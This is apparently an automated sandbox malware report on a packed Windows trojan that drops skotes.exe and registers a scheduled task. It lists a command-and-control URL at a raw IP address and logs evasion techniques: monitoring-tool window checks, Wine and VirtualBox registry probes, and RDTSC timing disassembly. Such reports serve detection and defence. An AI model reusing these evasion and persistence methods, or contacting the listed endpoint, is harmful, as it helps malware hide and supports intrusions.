Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php-
Source: skotes.exe, 00000007.00000002.3479317358.000000000163F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.php7n
Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpF
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpN
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpW
Source: skotes.exe, 00000007.00000002.3479317358.0000000001658000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpj
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpncoded_9
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpqYo30zpOYVp
Source: skotes.exe, 00000007.00000002.3479317358.000000000166E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNko/index.phpt9
Source: skotes.exe, 00000007.00000002.3479317358.0000000001689000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://185.215.113.43/Zu7JuNm

System Summary

PE file contains section with special chars

Source: msqT9atzYW.exe	Static PE information: section name:
Source: msqT9atzYW.exe	Static PE information: section name: .idata
Source: msqT9atzYW.exe	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:

Source: C:\Users\user\Desktop\msqT9atzYW.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FA78BB	7_2_00FA78BB
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FA8860	7_2_00FA8860
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FA7049	7_2_00FA7049
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00F64DE0	7_2_00F64DE0
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FA31A8	7_2_00FA31A8
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00F6E530	7_2_00F6E530
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FA2D10	7_2_00FA2D10
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00FA779B	7_2_00FA779B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00F64B30	7_2_00F64B30
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 7_2_00F97F36	7_2_00F97F36

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe 4FEAE1EA40A074D042BA08876D3C459DDDCEFC9D4EAAD6A5A0709DD482E899DF

Source: msqT9atzYW.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: msqT9atzYW.exe	Static PE information: Section: ZLIB complexity 0.998414083787466
Source: msqT9atzYW.exe	Static PE information: Section: xwcxlzln ZLIB complexity 0.9951746323529411
Source: skotes.exe.0.dr	Static PE information: Section: ZLIB complexity 0.998414083787466
Source: skotes.exe.0.dr	Static PE information: Section: xwcxlzln ZLIB complexity 0.9951746323529411

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@5/3@0/1

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Mutant created: \Sessions\1\BaseNamedObjects\006700e5a2ab05704bbb0c589b88924d

Source: C:\Users\user\Desktop\msqT9atzYW.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985

Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: msqT9atzYW.exe	ReversingLabs: Detection: 57%
Source: msqT9atzYW.exe	Virustotal: Detection: 52%

Source: msqT9atzYW.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: skotes.exe	String found in binary or memory: 3Cannot find '%s'. Please, re-install this application

Source: C:\Users\user\Desktop\msqT9atzYW.exe

File read: C:\Users\user\Desktop\msqT9atzYW.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\msqT9atzYW.exe "C:\Users\user\Desktop\msqT9atzYW.exe"
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: unknown	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: mstask.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: mpr.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: dui70.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: duser.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: chartv.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: oleacc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: atlthunk.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: windows.fileexplorer.common.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: explorerframe.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Section loaded: netutils.dll	Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{148BD52A-A2AB-11CE-B11F-00AA00530503}\InProcServer32

Jump to behavior

Source: msqT9atzYW.exe

Static file information: File size 1996800 > 1048576

Source: msqT9atzYW.exe

Static PE information: Raw size of xwcxlzln is bigger than: 0x100000 < 0x1b5c00

Data Obfuscation

Detected unpacking (changes PE section rights)

Source: C:\Users\user\Desktop\msqT9atzYW.exe	Unpacked PE file: 0.2.msqT9atzYW.exe.be0000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 2.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 3.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Unpacked PE file: 7.2.skotes.exe.f60000.0.unpack :EW;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW; vs :ER;.rsrc:W;.idata :W; :EW;xwcxlzln:EW;gxotezyq:EW;.taggant:EW;

Source: initial sample

Static PE information: section where entry point is pointing to: .taggant

Source: skotes.exe.0.dr	Static PE information: real checksum: 0x1efeb5 should be: 0x1ebd33
Source: msqT9atzYW.exe	Static PE information: real checksum: 0x1efeb5 should be: 0x1ebd33

Source: msqT9atzYW.exe	Static PE information: section name:
Source: msqT9atzYW.exe	Static PE information: section name: .idata
Source: msqT9atzYW.exe	Static PE information: section name:
Source: msqT9atzYW.exe	Static PE information: section name: xwcxlzln
Source: msqT9atzYW.exe	Static PE information: section name: gxotezyq
Source: msqT9atzYW.exe	Static PE information: section name: .taggant
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: .idata
Source: skotes.exe.0.dr	Static PE information: section name:
Source: skotes.exe.0.dr	Static PE information: section name: xwcxlzln
Source: skotes.exe.0.dr	Static PE information: section name: gxotezyq
Source: skotes.exe.0.dr	Static PE information: section name: .taggant

Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Code function: 7_2_00F7D91C push ecx; ret

7_2_00F7D92F

Source: msqT9atzYW.exe	Static PE information: section name: entropy: 7.987683787433311
Source: msqT9atzYW.exe	Static PE information: section name: xwcxlzln entropy: 7.954322884658926
Source: skotes.exe.0.dr	Static PE information: section name: entropy: 7.987683787433311
Source: skotes.exe.0.dr	Static PE information: section name: xwcxlzln entropy: 7.954322884658926

Source: C:\Users\user\Desktop\msqT9atzYW.exe

File created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe

Jump to dropped file

Boot Survival

Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)

Source: C:\Users\user\Desktop\msqT9atzYW.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: RegmonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: FilemonClass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Filemonclass	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: PROCMON_WINDOW_CLASS	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Window searched: window name: Regmonclass	Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe

File created: C:\Windows\Tasks\skotes.job

Jump to behavior

Source: C:\Users\user\Desktop\msqT9atzYW.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior

Malware Analysis System Evasion

Tries to detect sandboxes / dynamic malware analysis system (registry check)

Source: C:\Users\user\Desktop\msqT9atzYW.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\Desktop\msqT9atzYW.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_CURRENT_USER\Software\Wine	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Jump to behavior

Tries to detect virtualization through RDTSC time measurements

Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: C4EC1F second address: C4EC23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: C4EC23 second address: C4EC31 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE007Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDC629 second address: DDC633 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDC633 second address: DDC65F instructions: 0x00000000 rdtsc 0x00000002 jo 00007F43C8AE008Ch 0x00000008 jmp 00007F43C8AE0080h 0x0000000d jg 00007F43C8AE0076h 0x00000013 push eax 0x00000014 push edx 0x00000015 jng 00007F43C8AE0076h 0x0000001b jnc 00007F43C8AE0076h 0x00000021 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDC65F second address: DDC665 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDB5F0 second address: DDB5F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDB787 second address: DDB78B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDB78B second address: DDB794 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDB909 second address: DDB90D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDB90D second address: DDB913 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDB913 second address: DDB922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jg 00007F43C9098CE6h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDBA8A second address: DDBA8E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDBA8E second address: DDBA94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDBBF6 second address: DDBC19 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0089h 0x00000007 jne 00007F43C8AE0082h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDBC19 second address: DDBC1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDBD97 second address: DDBDD1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F43C8AE0082h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jo 00007F43C8AE0076h 0x00000012 jmp 00007F43C8AE0088h 0x00000017 pushad 0x00000018 popad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDBDD1 second address: DDBDE5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F43C9098CEFh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDBDE5 second address: DDBDF9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jo 00007F43C8AE0076h 0x0000000c jnc 00007F43C8AE0076h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDEE34 second address: DDEE38 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDEE38 second address: DDEE42 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jne 00007F43C8AE0076h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDEEDF second address: DDEF0C instructions: 0x00000000 rdtsc 0x00000002 js 00007F43C9098CECh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b pushad 0x0000000c push ecx 0x0000000d pushad 0x0000000e popad 0x0000000f pop ecx 0x00000010 pushad 0x00000011 js 00007F43C9098CE6h 0x00000017 jo 00007F43C9098CE6h 0x0000001d popad 0x0000001e popad 0x0000001f mov eax, dword ptr [esp+04h] 0x00000023 push edi 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDEF0C second address: DDEF34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edi 0x00000006 mov eax, dword ptr [eax] 0x00000008 jns 00007F43C8AE0096h 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F43C8AE0088h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\msqT9atzYW.exe	RDTSC instruction interceptor: First address: DDEF34 second address: DDEFA9 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 mov dword ptr [esp+04h], eax 0x0000000a js 00007F43C9098CEEh 0x00000010 pop eax 0x00000011 jne 00007F43C9098CECh 0x00000017 push 00000003h 0x00000019 movsx edx, cx 0x0000001c push 00000000h 0x0000001e or edi, 5B02A242h 0x00000024 push 00000003h 0x00000026 push 00000000h 0x00000028 push ecx 0x00000029 call 00007F43C9098CE8h 0x0000002e pop ecx 0x0000002f mov dword ptr [esp+04h], ecx 0x00000033 add dword ptr [esp+04h], 00000015h 0x0000003b inc ecx 0x0000003c push ecx 0x0000003d ret 0x0000003e pop ecx 0x0000003f ret 0x00000040 and di, 944Fh 0x00000045 push 70C650F8h 0x0000004a push eax 0x0000004b push edx 0x0000004c jmp 00007F43C9098CF8h 0x00000051 rdtsc
